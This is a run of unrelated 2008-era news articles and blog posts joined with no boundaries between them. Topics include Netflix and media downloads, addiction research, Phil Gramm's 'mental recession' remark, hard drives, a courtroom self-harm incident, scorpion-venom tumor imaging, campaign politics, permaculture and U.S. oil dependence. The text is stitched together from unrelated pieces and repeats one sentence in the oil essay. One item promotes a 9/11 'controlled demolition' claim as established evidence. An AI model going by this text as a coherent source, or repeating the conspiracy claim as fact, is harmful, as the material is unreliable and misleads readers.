You can browse a catalog from your device and find anything you want ; any media from any period .
If you have the bandwidth , you get it straight away through a progressive download .
If not , you hit a button and when you get home you find it ready for you on your home computer .
All content is cheap , encouraging a spendthrift atitude ( look at the App Store to see what a candy shop the internet can be when payment methods are almost invisible ) .
We do n't say that there should be only one place to buy these things .
There could ( and should ) be many .
What we do want is the end of fragmentation .
Companies have content to sell .
We want to put it on our computers and media players .
How hard can it be ?
Ironically , not hard at all – if you take the studios out of the equation .
My dream service ( with some gaps in inventory ) is available right now .
It 's made up of two parts .
They 're called YouTube and BitTorrent , and they 're cheaper and better than the competition .
Netflix suffers biggest outage ever [ Reuters ]
Netflix Goes Dark And Finds It 's No Place To Be [ CNBC ]
Previously on Gadget Lab :
Netflix Goes Down For 11 hours , Wall Street Pushes Its Stock to All - Time High
Using a chemical that blocks the creation of memories , scientists have prevented rats from using cocaine after they had become addicted to the drug .
The hope is that doctors will one day be able to give humans some version of the chemical and stop cocaine addiction in its tracks .
Barry Everitt , an experimental psychologist at the University of Cambridge in England , focused his group 's efforts on proteins called NMDA - type glutamate receptors in rat brains .
Previous work on addiction and post - traumatic stress has shown that these proteins — which are found on the surface of brain cells — are essential to memory formation .
The receptors are also crucial to reconsolidating a memory — moving it from its storage area in long - term memory to brain regions that handle short - term memory .
The researchers — who report their findings in the Journal of Neuroscience — put rats in a cage with a lever in it for a couple of hours per day for a week .
When the animals pushed the lever , a light would come on and a cocaine solution would be dispensed to the rat .
The rats began to associate the light they saw with cocaine .
After a couple weeks of forced sobriety , the animals were returned to the cage .
Before going back in , some of the rats received injections of experimental drugs that block NMDA - type glutamate receptors in the amygdala — a brain region that has been implicated in drug- associated memories .
Both treated and untreated animals , when back in the cage , would press the lever over and over again .
The light would come on , but no cocaine would be served .
Untreated animals continued unfazed , hoping cocaine would eventually come out .
For the treated animals , however , Everitt says , " They press the lever , but it does n't do anything , so they stop . "
The animals seemed to forget that the light in the cage meant cocaine was on its way for up to four weeks after only a single treatment .
Scientists say that suggests that by disrupting the recollection of a drug - associated memory — a person one abuses drugs with , a place that one uses drugs at , for example — a therapeutic may be able to break the connection between cues in the environment and the need for drugs .
Sometimes these cues can be quite close to home — a family member or loved one .
Yavin Shaham , a neurobiologist at the National Institute on Drug Abuse in Bethesda , Md. , said in a press statement that the new work is an example of " basic research that can be readily translated to the treatment of cocaine addiction in humans . "
With no approved medications on the market to specifically treat cocaine addiction , most treatment regimens rely of behavioral therapy .
Often , according to Everitt , these therapies involve exposing addicts to cues that they associate with drug use — but in the absence of the illicit substance .
Once a recovered addict encounters these cues back in the real world though , they often relapse .
Everitt suggests using an NMDA - type glutamate receptor blocker in the clinic could improve that treatment .
Karim Nader , a behavioral neuroscientist at McGill University in Montreal , called the new research " promising " for treating addiction , adding that he does n't know of a one - time treatment that causes rodents to stop taking drugs for long periods of time .
Everitt notes that while the drugs used in the current study are experimental , there are several drugs approved by the U.S. Food and Drug Administration that target the same receptors : Dextramethorphan , which is found in many over - the - counter cough suppressants and memantine , a drug approved to slow the progression of Alzheimer 's disease , are examples .
Phil Gramm , McCain 's economic advisor talks about a " Mental Recession " .
" You 've heard of mental depression ; this is a mental recession , " Gramm said , noting that growth has held up at about 1 percent despite all the publicity over losing jobs to India , China , illegal immigration , housing and credit problems and record oil prices .
" We may have a recession ; we have n't had one yet . "
" We have sort of become a nation of whiners , " he said .
" You just hear this constant whining , complaining about a loss of competitiveness , America in decline " despite a major export boom that is the primary reason that growth continues in the economy , he said .
" We 've never been more dominant ; we 've never had more natural advantages than we have today , " he said .
" We have benefited greatly " from the globalization of the economy in the last 30 years .
Mr. Gramm said the constant drubbing of the media on the economy 's problems is one reason people have lost confidence .
Various surveys show that consumer confidence has fallen precipitously this year to the lowest levels in two to three decades , with most analysts attributing that to record high gasoline prices over $ 4 a gallon and big drops in the value of homes , which are consumers ' biggest assets .
" Misery sells newspapers , " Mr. Gramm said .
" Thank God the economy is not as bad as you read in the newspaper every day . "
Obama Blasts McCain
Phil Gramm is more than a little out of touch with reality , and Obama Blasted McCain for it .
" Today , one of [ McCain's ] top economic advisors , former Sen. Phil Gramm , said that we 're merely in a ' mental recession , ' " Obama told a crowd of about 2,800 today at a town hall meeting in Fairfax , Va .
" He did n't say this but I guess what he meant was that it 's a figment of your imagination , these high gas prices .
Sen .
Gramm then deemed the United States , and I quote , 'a nation of whiners . '
Ho !
A nation of whiners .
This comes after Sen. McCain recently admitted that his energy proposals for the gas tax holiday and the drilling will have mainly , quote , ' psychological benefits , ' " Obama said .
McCain Attempts Damage Control
.
McCain strongly disavowed the comments saying Phil Gramm " does not speak for me — I speak for me . "
" So I strongly disagree , " McCain told reporters gathered for a press conference .
Democrats immediately condemned the remarks as “ callous ” and quickly began working to divert widespread attention to them .
Obama campaign spokesman Bill Burton shot back : " [ T ]he American people know that our economic problems are n’t just in their heads .
They do n’t need psychological relief , they need real relief .
And that ’s what Barack Obama will provide as president . "
The Democratic National Committee issued a statement titled , “ Out of Touch Much , Phil . ”
A McCain official said : “ Phil Gramm ’s comments are not representative of John McCain ’s views .
John McCain travels the country every day talking to Americans who are hurting , feeling pain at the pump and worrying about how they ’ll pay their mortgage .
That ’s why he has a realistic plan to deliver immediate relief at the gas pump , grow our economy and put Americans back to work . ”
Karen Finney , the Democratic National Committee ’s communications director , said : “ What John McCain , George Bush , Phil Gramm just do n't understand is that the American people are n't whining about the state of the economy ; they are suffering under the weight of it — the weight of eight years of Bush - enomics that John McCain and Phil Gramm have vowed to continue .
“ How dare john McCain and his advisers so callously dismiss the challenges the American people face ?
No wonder voters feel John McCain is out of touch .
He and his campaign do n't even understand the everyday issues Americans are dealing with . ”
According to several sources close to the hard drive industry , Western Digital is working on a 20,000 RPM Raptor hard drive to combat the increasing pressure from SSD manufacturers .
We have spoken to a lot of people out here in Taipei about this industry ’s direction and one thing is becoming clear : SSDs are going to be affordable in the next 12 to 18 months .
Because of this , hard drive manufacturers are starting to get a little worried about what marketshare SSDs might eventually take away from them — especially where performance is more of a concern than storage capacity .
And that ’s exactly what Western Digital ’s Raptor line is all about .
The new drive will be very similar to the recently - released VelociRaptor , in that it ’ll be a 2.5 in drive with a custom 3.5 in housing built around it .
Details are incredibly light at this stage , given that the product is still in development , and we do n’t even have a release timeframe at the moment .
However , our sources said that the drive will be ‘ silent ’ – that ’s the last thing I would have expected from a drive with platters spinning at 20,000 RPM .
Western Digital is apparently working on silencing the beast by improving the housing technology , which will now not just act as a heatsink , but also as a noise cancelling device .
We ’d also hope that the drive enclosure has some vibration dampening technology as well , because that ’s also likely to be a problem given the high spindle speeds .
What do you think of these plans : feasible or barking mad ?
Discuss in the forums
Want to know what ’s really going on in your own head ?
The mental health Web site PsychCentral offers a list of the best online psychology tests .
Some of these are used to collect data for research experiments , while others are skill tests or quizzes that offer personal insights .
Here are a few of the best .
1. The Stroop Test .
A fun test that measures how fast and flexible a thinker you are by using color - coded words .
2. The Worst Sounds .
Grab your headset and take this online sound test to find out which sounds bother you the most .
You ’ll hear snoring , crying babies and nails on the chalkboard .
3. Personality Test .
Check out the “ I Just Get Myself ” personality test .
It comprises just 40 easy questions but delivers a surprisingly insightful ( at least I thought so ) assessment of your personality traits .
4. Memory Test .
After a series of numbers appears on the screen , click on a keypad to test your memory .
5. Reaction to Faces .
This test allows you to rate your preference for different facial characteristics .
Another test , PerceptionLab , measures your reaction to different faces .
6. Personal Biases .
Test your implicit biases about race and other issues .
And for even more insight , take PsychCentral ’s own Sanity Score quiz , which is designed to assess aspects of your mental health , including your risk for depression , anxiety and other emotional disorders .
For additional tests and more information about online psychology assessments , read the full PsychCentral article by clicking here .
Updated at 7:55 p.m.
By PETER GOONAN , GEORGE GRAHAM and PATRICK JOHNSON
Staff writers
SPRINGFIELD - Seconds after learning a jury found him guilty of sexually assaulting a child , a defendant in Hampden Superior Court pulled a sharpened metal object from his pocket Friday morning and slashed his throat .
Donald R. Gibson , 39 , of Springfield , was able to cut himself with a sharp piece of metal from a battery casing while Assistant Clerk of Courts Laura S. Gentile announced guilty verdicts on two counts of indecent assault and battery on a child under 14 .
Court officers grabbed him , disarmed him and tried to control the bleeding as the jury was ushered out of the courtroom , according to those present .
First Assistant District Attorney James C. Orenstein said Gibson 's wounds did not appear to be life - threatening .
A spokesman with Baystate Medical Center said he had no information on Gibson 's condition .
The Hampden County Sheriff 's Department is investigating how Gibson could arm himself with a makeshift weapon and bring it into the courtroom undetected , said spokesman Richard J. McCarthy .
The object was a piece of metal from a battery case and about the size of a quarter , he said .
Gentile said she had just finished reading that Gibson had been found guilty of two counts and was about to announce he had been found innocent of a third when she was interrupted by Gibson screaming .
She said she looked over and saw court officers George Bass and Richard Budzyna rush to subdue him .
And then she saw the blood .
" There was a lot of blood , " she said .
She said several times during her 12 years with the courts she has seen defendants who had to be restrained .
When Gibson began screaming , she did not consider it very unusual until she saw the blood , Gentile said .
That was a first , she said .
She credited Bass and Budzyna for acting quickly to minimize Gibson 's action and injury , and Judge Bertha D. Josephson for maintaining order while the jury was cleared from the room .
" The court officers were amazingly quick .
When they saw the slightest movement , ( Gibson ) was being subdued . "
One of the officers compressed the wound with a leather glove while the other disarmed Gibson and put handcuffs on him , she said .
Gibson was not wearing handcuffs , she said .
Defendants never appear in handcuffs before a jury because it could influence the verdict .
After Gibson was restrained , Gentile read the third verdict announced he had been found innocent of a third charge .
The scene was alarming , said those present .
" It 's a very rare event and was extremely unsettling to the victim 's family , in the courtroom at the time , as well as the jury that witnessed it , " Orenstein said .
Gibson 's lawyer , John J. O'Neill , said the episode was " very intense .
What happened was very traumatic for everyone involved . "
He said he had not been updated on his client 's condition .
He said he is due back in court with Gibson for sentencing Aug. 21 .
Josephson ordered Gibson 's right to bail revoked .
His last known address was on Sumner Avenue .
While the trial began Wednesday , Gibson has been an inmate at the Hampden County Correction Center in Ludlow since Jan. 5 , 2006 , according to McCarthy .
Gibson was charged with three separate acts on a 11 - year - old child , Orenstein said .
He was arraigned on the charges March 8 , 2006 .
Bail at that time was set at $ 5,000 cash or a $ 50,000 surety , according to the clerk 's office .
With the start of the trial , the Sheriff 's Department had brought Gibson to the courthouse each morning from the jail , where he had been serving an unrelated sentence .
McCarthy would not say what the previous conviction was for , and O'Neill said he would not give any information about his client 's past .
McCarthy said Gibson went through normal screening processes at the jail before leaving for the courthouse .
These include sitting in a metal - detection scanning chair and being tested with another scanner that checks the head and mouth .
Video confirms that Gibson underwent both scanning procedures , McCarthy said .
It 's possible , McCarthy said , that the weapon 's size and composition , perhaps of some type of alloy , enabled Gibson to evade detection .
" We have begun testing the metal detection system , so we do n't have any definitive answers right now , " McCarthy said .
McCarthy said it 's not unheard of at the jail for a battery casing to be fashioned into a weapon .
" In the past , just about anything with any kind of metal or alloy has , at one point , been fashioned into a potential weapon , " McCarthy said .
Aug. 11 , 2008  --
The sting of the Giant Yellow Israeli Scorpion packs a painful punch .
Its venom contains a potent cocktail of neurotoxins that places an animal or human victim in excruciating agony .
It 's not the first place most would think to look for a weapon against cancer .
But doctors and researchers report that a particular component within this dangerous mix may be able to seek out brain tumor cells .
And one researcher , as reported by ABC affiliate KOMO - TV in Seattle , hope that doctors will one day be able to use this property to " paint " tumors for a surgeons to see .
" Right now it is difficult for a surgeon to be able to distinguish a brain tumor from the normal brain tissue around it , " says Dr. James Olson of the Fred Hutchinson Cancer Research Center .
He says that this situation often presents today 's brain surgeon with an unenviable decision : choose either to cut aggressively , potentially damaging healthy brain tissue , or cut conservatively and run the risk of leaving tumor cells behind .
Enter T - 601 , the synthetic version of a chemical first found in the scorpion 's sting .
Neurobiologist Harold Sontheimer of the University of Alabama at Birmingham , who was the first to explore the medical potential of this chemical , found that it was able to pass into the brain unobstructed .
That 's a feat for most chemicals , as the membrane that separates the brain from the bloodstream ( known as the blood - brain barrier ) is notoriously impermeable .
For the scorpion , this property if its venom ensures a quick kill of its unfortunate prey .
But subtract the poisonous components from the venom , and you have a perfect vehicle for penetrating the brain .
What 's more , researchers have found that this chemical seeks out and binds to brain tumor cells .
Olson says these properties make T - 601 a perfect candidate for helping doctors distinguish the borders of brain tumors .
" The scorpion has had millions of years to optimize this chemical that crosses into the brain to damage its prey , " he says .
" It would have cost drug companies hundreds of millions of dollars to develop something like this . "
It 's not the first time researchers have eyed this compound as a potential cancer fighter .
In 2006 , Dr. Adam Mamelak , a neurosurgeon at Cedars - Sinai Medical Center in Los Angeles , sought to exploit these properties by using the chemical to carry tiny bits of radioactive material into the brains of patients who had gone through surgery to have brain tumors called gliomas removed .
The idea was that the chemical would seek out the remaining bits of brain cancer , latch onto them , and destroy them .
Preliminary trials in humans showed some success .
And Mamelak says Olson 's approach may hold promise where other tagging techniques have failed .
" This method has been tried with antibodies for man years with less success due to the large size of antibodies , " he notes .
But he adds that there could still be a long way to go before such approaches become a fixture in the clinical setting .
" Unfortunately , while this technology is ' sexy ' and visually appealing , it is unlikely to have much impact on cancer treatment in the near future , " Mamelak says .
Shedding Light on Brain Tumors
Still , other experts in the area of brain research say Olsen 's technique represents an exciting step toward better brain tumor removal .
" This is a very exciting development in the field of tumor cell markers , which can be used to improve a surgeon 's ability to identify and remove tumors with surgery , " says Dr. Allen Sills , executive director of the Memphis Regional Brain Tumor Center and associate professor of neurosurgery at the University of Tennessee College of Medicine .
" A more complete removal of the tumor has been shown to clearly result in longer survival for patients with all forms of brain tumors and may offer hope for curing some types of tumors . "
Considering the grim prognosis that often accompanies such tumors , the prospect of longer survival is a welcome one .
For the roughly 17,000 Americans who face a glioma diagnosis each year , life expectancy is generally measured in months .
On average , fewer than one in 10 is alive after two years .
After five years , the figure is more like one in 30 .
The dire situation of these patients has led to other novel approaches to differentiate cancerous cells in the brain from healthy ones .
" Several agents are in , or have been in , clinical trials in Europe , " says Dr. Gene Barnett , professor and director , of the Brain Tumor and Neuro - Oncology Center at the Cleveland Clinic Neurological Institute .
" What all of these techniques have in common is that they should -- and do , for those that have been scientifically tested -- help the surgeon do more complete surgery .
More complete surgery may translate to better , longer survival for patients with malignant brain tumor , as long as the surgery can be done safely . "
Hurdles Remain
Despite hope and continued development of T - 601 , however , clinical applications are likely years away .
" A big problem is that the fluorescent dyes that Olson used are not FDA - approved and most are very toxic , " Mamelak says .
" There are basically very few such dyes that are approved , with relatively little incentive due to the costs of toxicity testing to make this approach financially feasible . "
But what if the potential of this chemical could be fully harnessed ?
Olson says that the chemical may be used not only to detect brain cancer cells , but for early detection of other cancers as well .
" We 're learning that many kinds of cancer may be able to be detected using tumor paint , " Olson says , noting that in the scenario he imagines , a patient could take a tumor paint pill the night before seeing a doctor .
Once this patient arrives at the doctor 's office , the doctor could perform a simple scan that could detect even small cancer cells early .
For now , such a scenario remains largely theoretical .
Still , Olson continues his research .
He is currently planning a trip to Australia to work with a toxin and venom group there to see what other venoms may have the same type of therapeutic potential .
" When this idea was proposed to the National Cancer Institute , it was perceived as highly speculative and ambitious , " Olson says .
" The families of patients have paid for all this research .
" I think it is a beautiful gift , not only to those who have brain cancer , but as a prospective test for all cancer , if this bears fruit . "
There 's probably no connection whatsoever .
But the New Yorker writer Ryan Lizza , whose long , long article on Barack Obama 's early political days in Chicago 's ward politics ( available here ) was the reason for the magazine 's controversial cover by Barry Blitt depicting Obama as a Muslim , has been barred from traveling with Obama on his foreign field trip this week .
The elitist magazine claimed the cover 's depiction wa s satirical of a Muslim Obama fist - bumping with a militant wife Michelle armed with an AK - 47 beneath a portrait of Osama bin Laden while they burn a U.S. flag -- in the Oval Office .
Initially , the Obama campaign and John McCain 's spokesman denounced the cover .
Later , a cooler Obama dismissed it as a weak attempt at satire amid much more important things to discuss .
More than 200 media folks applied to fly in Europe with the freshman senator .
But , alas , the Obama campaign said it simply was not able to find a seat for Lizza .
( Overdue hat tip to Mike Allen at Politico.com )
Now , that 's Chicago politics .
-- Andrew Malcolm
OMNI TV Interview Program : The Standard
Airdate : April 22 , 2008
Vancouver , BC Canada
In this 20 minute Satellite TV interview , Richard Gage , AIA , of Architects & Engineers for 9/11 Truth lays out all the evidence for the controlled demolition of the 3 WTC high - rises on 9/11 .
The next day Vancouver 9/11 Truth had to turn away 50 people in this standing room only venue of 300 at the famous Vancouver Public Library .
Here is the 20 minute power packed video that you can play for your friends , colleagues , and , of course , your local A&E's !
Griffin's PowerJolt is the USB version of the company 's FireWire - based PowerPod auto charger for the iPod .
Like the PowerPod , the PowerJolt plugs into your car 's accessory ( " cigarette lighter " ) jack and provides power to any device connected to its port .
However , unlike the PowerPod , which featured a FireWire 400 port , the PowerJolt provides a USB port .
You can charge an iPod shuffle by plugging it directly into the USB port , or you can charge a 4G or later full - size iPod or an iPod mini using the included USB dock connector cable .
( The PowerPod can charge any dock - connector iPod via an included FireWire dock connector cable . )
Although at $ 25 the PowerJolt is more expensive than some of the other auto chargers we 've seen , it 's not really that pricey when you consider that it includes a 4 - foot USB dock connector cable , a version of which Apple sells for $ 19 . -- Dan Frakes
Cindy Hensley McCain has dedicated her life to improving the lives of those less fortunate both in the United States and around the world .
A native Arizonan , mother of four , and wife of U.S. Senator John McCain , Cindy McCain is known for lending her time and talent to increase awareness of international charity organizations and the work that they do to make the world a better place .
As an advocate for children 's health care needs , Cindy founded and ran the American Voluntary Medical Team ( AVMT ) from 1988 to 1995 .
AVMT provided emergency medical and surgical care to impoverished children throughout the world .
Cindy led 55 medical missions to third world and war - torn countries during AVMT 's seven years of existence .
On one of those missions , Mother Teresa convinced Cindy to take two babies in need of medical attention to the United States .
One of those babies is now their adopted daughter , 15 year old Bridget McCain .
In recent years , three organizations in particular have been the subject of her international focus : HALO , Operation Smile , and CARE .
As a member of the Board of Trustees for the HALO Trust , a non-profit organization dedicated to landmine removal and weapons destruction in war - torn countries , Cindy has traveled to numerous countries to see firsthand the impact HALO has had by removing landmines .
She recently returned from her second visit to Cambodia .
She has also traveled to Sri Lanka , Mozambique , and Angola .
Cindy also serves on the Board of Directors for Operation Smile , a non-profit organization whose mission is to repair cleft lips , cleft palates and other facial deformities for children around the world .
Since 1982 , Operation Smile has provided free reconstructive surgery to over 100,000 children and young adults in 25 countries .
Cindy has assisted on volunteer missions to Morocco , India , and Vietnam .
She is hoping to accompany them on a mission to China in 2007 .
Cindy recently accepted a position on the Board of Directors for CARE , USA which works to fight global poverty , particularly among women .
She traveled to Tanzania in February 2007 to attend her first international board meeting .
While she typically leaves politics to her husband , Cindy was an instrumental part in her husband 's run for the presidency in 2000 .
That year , she was chosen to represent the state of Arizona at the Republican National Convention as the Chairwoman of the Arizona Delegation .
During the campaign , she traveled extensively , speaking to groups across America about Senator McCain and her passion for volunteering to help the less fortunate .
In addition to her humanitarian work , Cindy is the chairman of her family 's business , Hensley & Company , which is one of the largest Anheuser - Busch distributors in the nation .
Her formal education includes an undergraduate degree in Education and a Master 's in Special Education from the University of Southern California .
As a student , Cindy participated in pilot programs testing Movement Therapy , which is now a widely accepted standard for working with severely disabled children .
After receiving her degrees from USC , she began her teaching career at Agua Fria High School in Arizona where she continued her work with disabled children .
Cindy resides in Phoenix with her husband , U.S. Senator John McCain .
Together , they have four children : Meghan , Jack , Jimmy , and Bridget .
The cognitive surplus is the reason this blog exists , and likely the reason you 're reading it right now .
According to author Clay Shirky , it 's also responsible for things like the Industrial Revolution , and it may be about to change the way we live in an even more dramatic way .
The classic example of cognitive surplus is this : when British society started becoming more urban and crowding into London in the mid 18th century , it took people awhile to realize they were sitting on a cognitive gold mine ; all those minds together in one place had an unprecedented potential to accomplish great things .
But they were so freaked out by the sudden disappearance of the way of life their families had cultivated for a thousand years , and at finding themselves stuck in the increasingly loud , rank , dangerous city of London , that instead of taking advantage of their new situation , they spent a lot of time drinking gin .
In fact , Shirky argues , they went on a generation - long bender , so extreme that " the stories from that era are amazing -- there were gin pushcarts working their way through the streets of London . "
No joke :
In the 18th century there was an epidemic of gin drinking in England .
Rot - gut gin was destroying lives and families .
Gin shops sold their product for one penny a pint .
People died in vast numbers from cirrhosis of the liver .
In London there were twice as many burials as baptisms .
William Hogarth 's savage portrait of Gin Lane in 1751 ( above ) stressed the terrible dissolution of the time : a house is falling down , a corpse is being put into a cart and a woman is so drunk that she is dropping her baby over a railing .
Flash forward to the 1950s .
The war is over , Americans are cooling their heels back home , enjoying something they never experienced during the Depression or the War that followed : free time .
And kind of a lot of it , really ; in other words , a cognitive surplus .
And what should come along in response to this new national surplus ?
The Golden Age of Television , of course .
So according to this hopefully not - too - tortured analogy , Americans ' TV in the 50s was a bit like Londers ' gin pushcarts in the 1760s ; it was a way to spend a cognitive surplus we did n't quite know what to do with yet .
But instead of an Industrial Revolution coming along to take advantage of our cognitive surplus in a useful way , Shirky argues , we got the internet .
Here 's where this train of thought gets really interesting :
So how big is our surplus ?
So if you take Wikipedia as a kind of unit , all of Wikipedia , the whole project -- every page , every edit , every talk page , every line of code , in every language that Wikipedia exists in -- that represents something like the cumulation of 100 million hours of human thought .
I worked this out with Martin Wattenberg at IBM ; it 's a back - of - the - envelope calculation , but it 's the right order of magnitude , about 100 million hours of thought .
And television watching ?
Two hundred billion hours , in the U.S. alone , every year .
Put another way , now that we have a unit , that 's 2,000 Wikipedia projects a year spent watching television .
Or put still another way , in the U.S. , we spend 100 million hours every weekend , just watching the ads .
This is a pretty big surplus .
People asking , " Where do they find the time ? " when they 're looking at things like Wikipedia do n't understand how tiny that entire project is , as a carve - out of this asset that 's finally being dragged into what Tim calls an architecture of participation .
Now , the interesting thing about a surplus like that is that society does n't know what to do with it at first -- hence the gin , hence the sitcoms .
Because if people knew what to do with a surplus with reference to the existing social institutions , then it would n't be a surplus , would it ?
It 's precisely when no one has any idea how to deploy something that people have to start experimenting with it , in order for the surplus to get integrated , and the course of that integration can transform society .
All of which , naturally , got me thinking about my own personal surplus .
Sure , we all feel busy , but once you start adding up the hours I 've spent freaking out over Lost or shredding the competition in multiplayer online Guitar Hero , it becomes significant .
I did a back - of - napkin calculation of my own , and figured that I 've spent roughly 1,000 hours blogging for mental_floss since 2006 .
( I 'm sure the time I 've spent watching TV and movies is at least twice that , if not more . )
But instead of figuring out what else I could be doing with that time , I 'll ask you guys :
What 's your annual cognitive surplus ?
Is there anything you 'd rather be doing with it ?
Military insists ' segregation boxes ' for Iraqi prisoners are ' humane '
David Edwards and Stephen C. Webster
Published : Thursday August 7 , 2008
Print This Email This
CNN 's Barbara Starr , in a Thursday report , examined what the US military is calling ' segregation boxes ' : small , wooden crates being used in Iraq to hold prisoners , which the US military insists are ' humane . '
Measuring 3 feet square and about 6 feet tall , the military claims that prisoners isolated in the chambers are checked frequently , but the practice is raising concern among human rights advocates .
" There is concern that they could be used in places where detainees are enclosed in extremely hot conditions , " said Jennifer Daskal of Human Rights Watch .
" Typically , prisoners are isolated for no more than 12 hours , " said Starr .
" Someone in a segregation box is actually observed more than those anywhere else , " Maj . Neil Fischer with the United States Marine Corps told CNN .
" Since the abuses at Abu Ghraib , the US has improved conditions for the 20,000 detainees it holds , " said Starr .
" The US hopes to continue releasing prisoners .
Recently , some 20 foreign fighters were sent back to Egypt and Saudi Arabia , and thousands of Iraqis have been set free . "
" We are able to capture threats to the Iraqi government and the population , detain them , rehabilitate them , and 99 times out of 100 , release them , " said Geoff Morrell , a Pentagon spokesman .
And while the military insists the prisoners held in ' segregation boxes ' are given food , water and access to a toilet , " human rights advocates warn that as long as the US military puts people in these conditions , the day may come when a captured US military member is held in a wooden crate somewhere in the world , " said Starr .
This video is from CNN.com , broadcast August 7 , 2008 .
Download video
When I picture a Lego PC in my head , I see a vivid red , yellow and blue case topped with a small army of minifigs and maybe a pirate ship .
But this Lego PC looks nothing like that childhood dream machine , unless you want your kid experimenting with knives and hard alcohol by age 7 .
Assembled from 1238 total pieces costing roughly $ 140 , the case even features an easily removable side panel ( that does n't require complete deconstruction ) for future component upgrades .
And since it 's Friday and you have nothing more pressing to do at work , here 's a time lapse video of the guy building the system in his pajamas :
See ?
Are n't you glad you watched that ?
[ Lego Computer ]
Thinking tools , that when used together , allow us to creatively re-design our environment and our behavior in a world of less energy and resources
The foundations of permaculture are the ethics ( centre ) which guide the use of the 12 design principles , ensuring that they are used in appropriate ways .
These principles are seen as universal , although the methods used to express them will vary greatly according to the place and situation .
They are applicable to our personal , economic , social and political reorganisation as illustrated in the permaculture flower
Each principle can be thought of as a door that opens into whole systems thinking , providing a different perspective that can be understood at varying levels of depth and application .
Click on each of the principles icons to find out more , including a catchy tune about each of them – available from the album Permaculture : A Rhymer ’s Manual .
A free poster download of the principles is also available .
The short video below is an extract from our Permaculture Ethics and Principles DVD , it gives an overview of how the ethics and design principles relate to each other and how they can be used in a design process .
For a deeper insight make sure you read the Essence of Permaculture , a summary of David Holmgren ’s seminal work Permaculture : Principles and Pathways Beyond Sustainability .
You can find out more about how the design principles can be applied to business in this article by co-originator of the Transition Network , Rob Hopkins .
Monday , 04 Aug , 2008 Offbeat
Kiwi Town Banned in Cyberspace Because Its Name Sounds Like the F - Word
A small town found in New Zealand was banned in cyberspace due to the fact that its name sounds almost like the offensive F - word .
The news regarding the censorship was discovered when one of the visitors to the tourist town located on the east coast of the North Island attempted to connect to Freenet , a wireless service of the local council .
When he entered the search term " Whakatane " , his Internet searches were discarded and the Freenet website provided the following information : " The content is filtered so this service is for legitimate use . ''
It is worth mentioning that the combination of letters " WH " in Maori is pronounced as " F " .
According to Barney Dzowa , spokesman for the Whakatane District Council , the problem connected with the rejection of the searches results for " Whakatane " is linked with the pronunciation of the town 's name .
" The content filter is an American - based product , and it does a phonetic analysis of what has been typed in , '' the spokesman said .
" Whakatane , to the system , sounds like an F - word , " he added .
After the problem was unveiled , the council has added the town 's name to a list which features words that can take priority over the content filter .
Powered by www.infoniac.com
Portrait of an Oil - Addicted Former Superpower
ECONOMIC COMMENTARY : Portrait of an Oil - Addicted Former Superpower How Rising Oil Prices Are Obliterating America 's Superpower Status by Michael T. Klare
As far as the oil exporters are concerned , we 're now just another of those hopeless oil addicts driving a monster gas - guzzler up to the pump -- and they 're perfectly happy to collect our cash which they can then use to cherry - pick our prime assets .
Nineteen years ago , the fall of the Berlin Wall effectively eliminated the Soviet Union as the world 's other superpower .
Yes , the USSR as a political entity stumbled on for another two years , but it was clearly an ex-superpower from the moment it lost control over its satellites in Eastern Europe .
Less than a month ago , the United States similarly lost its claim to superpower status when a barrel crude oil roared past $ 110 on the international market , gasoline prices crossed the $ 3.50 threshold at American pumps , and diesel fuel topped $ 4.00 .
As was true of the USSR following the dismantling of the Berlin Wall , the USA will no doubt continue to stumble on like the superpower it once was ; but as the nation 's economy continues to be eviscerated to pay for its daily oil fix , it , too , will be seen by increasing numbers of savvy observers as an ex-superpower - in - the - making .
That the fall of the Berlin Wall spelled the erasure of the Soviet Union 's superpower status was obvious to international observers at the time .
After all , the USSR visibly ceased to exercise dominion over an empire ( and an associated military - industrial complex ) encompassing nearly half of Europe and much of Central Asia .
The relationship between rising oil prices and the obliteration of America 's superpower status is , however , hardly as self - evident .
So let 's consider the connection .
Dry Hole Superpower
The fact is , America 's wealth and power has long rested on the abundance of cheap petroleum .
The United States was , for a long time , the world 's leading producer of oil , supplying its own needs while generating a healthy surplus for export .
Oil was the basis for the rise of first giant multinational corporations in the U.S. , notably John D. Rockefeller 's Standard Oil Company ( now reconstituted as Exxon Mobil , the world 's wealthiest publicly - traded corporation ) .
Abundant , exceedingly affordable petroleum was also responsible for the emergence of the American automotive and trucking industries , the flourishing of the domestic airline industry , the development of the petrochemical and plastics industries , the suburbanization of America , and the mechanization of its agriculture .
Without cheap and abundant oil , the United States would never have experienced the historic economic expansion of the post - World War II era .
No less important was the role of abundant petroleum in fueling the global reach of U.S. military power .
For all the talk of America 's growing reliance on computers , advanced sensors , and stealth technology to prevail in warfare , it has been oil above all that gave the U.S. military its capacity to " project power " onto distant battlefields like Iraq and Afghanistan .
Every Humvee , tank , helicopter , and jet fighter requires its daily ration of petroleum , without which America 's technology - driven military would be forced to abandon the battlefield .
No surprise , then , that the U.S. Department of Defense is the world 's single biggest consumer of petroleum , using more of it every day than the entire nation of Sweden .
As long as most of our oil came from domestic sources and the price remained reasonably low , the American economy thrived and the annual cost of deploying vast armies abroad was relatively manageable .
From the end of World War II through the height of the Cold War , the U.S. claim to superpower status rested on a vast sea of oil .
As long as most of our oil came from domestic sources and the price remained reasonably low , the American economy thrived and the annual cost of deploying vast armies abroad was relatively manageable .
But that sea has been shrinking since the 1950s .
Domestic oil production reached a peak in 1970 and has been in decline ever since -- with a growing dependency on imported oil as the result .
When it came to reliance on imports , the United States crossed the 50 % threshold in 1998 and now has passed 65 % .
Though few fully realized it , this represented a significant erosion of sovereign independence even before the price of a barrel of crude soared above $ 110 .
By now , we are transferring such staggering sums yearly to foreign oil producers , who are using it to gobble up valuable American assets , that , whether we know it or not , we have essentially abandoned our claim to superpowerdom .
According to the latest data from the U.S. Department of Energy , the United States is importing 12 - 14 million barrels of oil per day .
At a current price of about $ 115 per barrel , that 's $ 1.5 billion per day , or $ 548 billion per year .
This represents the single largest contribution to America 's balance - of - payments deficit , and is a leading cause for the dollar 's ongoing drop in value .
If oil prices rise any higher -- in response , perhaps , to a new crisis in the Middle East ( as might be occasioned by U.S. air strikes on Iran ) -- our annual import bill could quickly approach three - quarters of a trillion dollars or more per year .
While our economy is being depleted of these funds , at a moment when credit is scarce and economic growth has screeched to a halt , the oil regimes on which we depend for our daily fix are depositing their mountains of accumulating petrodollars in " sovereign wealth funds " ( SWFs ) -- state - controlled investment accounts that buy up prized foreign assets in order to secure non-oil - dependent sources of wealth .
At present , these funds are already believed to hold in excess of several trillion dollars ; the richest , the Abu Dhabi Investment Authority ( ADIA ) , alone holds $ 875 billion .
The ADIA first made headlines in November 2007 when it acquired a $ 7.5 billion stake in Citigroup , America 's largest bank holding company .
